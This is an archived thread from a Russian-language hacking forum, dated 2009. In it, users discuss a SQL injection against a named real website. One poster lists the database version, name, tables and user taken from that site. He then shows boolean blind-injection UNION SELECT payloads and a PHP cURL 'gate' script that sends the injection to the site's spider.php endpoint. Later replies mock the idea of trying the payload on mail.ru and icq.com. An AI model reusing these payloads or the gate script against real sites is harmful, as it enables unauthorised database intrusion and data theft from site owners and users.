ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.11.2009, 16:41
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
VERSION() 5.1.38-log
DATABASE() host1000119_search
Таблы в БД host1000119_search
0 search_categories
1 search_domains
2 search_keywords
3 search_link_keyword0
4 search_link_keyword1
5 search_link_keyword2
6 search_link_keyword3
7 search_link_keyword4
8 search_link_keyword5
9 search_link_keyword6
10 search_link_keyword7
11 search_link_keyword8
12 search_link_keyword9
13 search_link_keyworda
14 search_link_keywordb
15 search_link_keywordc
16 search_link_keywordd
17 search_link_keyworde
18 search_link_keywordf
19 search_links
20 search_keywords
21 search_query_log
22 search_site_category
23 search_sites
24 search_temp
 Структура прям ппц
USER() host1000119_sear@localhost
Для юзера доступно 2 БД
host1000119_search
information_schema
ппц, а как работат sakh-sun.ru
Знач там другой юзверь 
Последний раз редактировалось Ponchik; 16.11.2009 в 16:51..
|
|
|
16.11.2009, 16:44
|
|
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379
Репутация:
1069
|
|
24 штуки...
Пончик хек  |
|
|
|
16.11.2009, 16:58
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Сообщение от l1ght
вот для кого люди стараются ? https://forum.antichat.ru/showpost.php?p=1630322&postcount=13 Там описан метод как найти таблы если пага не меняется, но есть вывод ошибок, и то там брутом
А тут пага меняется, при TRUE говорит "присутствует в базе данных" если FALSE - не говорит
http://' UNION SELECT 1,2 FROM INFORMATION_SCHEMA.TABLES WHERE 1=1#
http://' UNION SELECT 1,2 FROM INFORMATION_SCHEMA.TABLES WHERE 1=2#
Если запрос вернёт "1" скрипт говорит "присутствует в базе данных", просто Union select 1,2 не вернёт, поэтому надо из таблы, и добовляем условие
Хакеры... 
Нате вам гейт для GET Запроса
PHP код:
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://search.sakh-sun.ru/spider.php");
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'url=http%3A%2F%2F2q%27+UNION+SELECT+1%2C2+FROM+information_schema.tables+WHERE+1%3D1'.$_GET['c'].'&soption=level&maxlevel=2&in=&out=');
curl_exec($ch);
curl_close($ch);
?>
Можно будет юзать script.php?c=%20AND 1=1%23
Ну я для себя делал потомучо мне быстрее гейт написать, чем настроить тузлу на POST
Последний раз редактировалось Ponchik; 16.11.2009 в 17:10..
|
|
|
|
16.11.2009, 17:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Пончик, а шо это ты сделал ? Я ничего не пойму
|
|
|
|
16.11.2009, 17:11
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Сообщение от Filadmix
Пончик, а шо это ты сделал ? Я ничего не пойму
Да хз, я видео скачал и повторял всё как в видео, вон, вроде получилось
Но блин, я захожу на mail.ru пишу в поиск
http://' UNION SELECT 1,2 FROM INFORMATION_SCHEMA.TABLES WHERE 1=2#
и ничего неполучается, на icq.com таже телега, чё делать?
|
|
|
|
16.11.2009, 17:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Цитата:
http://' UNION SELECT 1,2 FROM INFORMATION_SCHEMA.TABLES WHERE 1=2#
и ничего неполучается, на icq.com таже телега, чё делать?
Я тоже ввожу и нифига. Пишет что такого документа не найдено, что же делать ? Наверное тут ошипка
|
|
|
|
16.11.2009, 19:03
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 253
Провел на форуме:
1586992
Репутация:
892
|
|
ссори но ху*ня имхо
|
|
|
|
16.11.2009, 19:07
|
|
Познающий
Регистрация: 01.10.2009
Сообщений: 30
Провел на форуме:
363975
Репутация:
101
|
|
Kamik
Флудер
Регистрация: 02.12.2008
Сообщения: 4,294,967,294
Провел на форуме:
3 дня 6 часов 12 минут
Репутация: 2
О_____О
WTF?!
|
|
|
|
16.11.2009, 19:33
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850
Репутация:
536
|
|
Ponchik, в гугле inj'a нормально пашет, а на майле нет?? Гугл - сакс, юзайте майл!!
|
|
|
|
16.11.2009, 19:37
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 253
Провел на форуме:
1586992
Репутация:
892
|
|
Kamik
Флудер
Регистрация: 02.12.2008
Сообщения: 4,294,967,294
Провел на форуме:
3 дня 6 часов 12 минут
Репутация: 2
чё за херня? о_О WTF?!
Добавлено позже:
Аа всё ясно, эт глюк...
Последний раз редактировалось LiteMentaL; 16.11.2009 в 19:46..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
